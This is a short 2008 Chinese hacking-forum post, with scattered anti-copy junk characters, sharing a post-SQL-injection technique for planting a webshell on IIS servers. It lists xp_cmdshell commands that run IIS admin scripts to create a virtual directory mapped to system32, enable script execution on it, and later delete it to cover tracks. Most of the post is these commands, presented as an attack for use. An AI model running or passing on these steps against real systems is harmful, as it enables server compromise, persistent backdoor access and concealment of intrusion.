|
- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:- K2 ]1 a3 |: V5 v& b
K* N F, s" d, |4 {; ~) ^exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
' }2 j! Q& U/ I% o* |/ K建立虚拟目录win,指向c:\windows\system32
% @/ e+ ]! j+ ^) C3 i) v- Gexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
- e3 L: e% `4 i" L/ |让win句有解析asp脚本权限
H5 q7 `( r8 q6 ~' O; r! L4 B# ]. {& |
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/", P7 l2 ^8 Q, Q N5 p. g
删除虚拟目录。
/ ]& J; l' F( U" C* x找不到web绝对路径的一种解决办法,
8 Y5 ~4 w1 u, }: D$ o
/ {# x! t8 V' [1 b0 F6 I+ y403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|
发表于 2008-10-22 14:38
| 
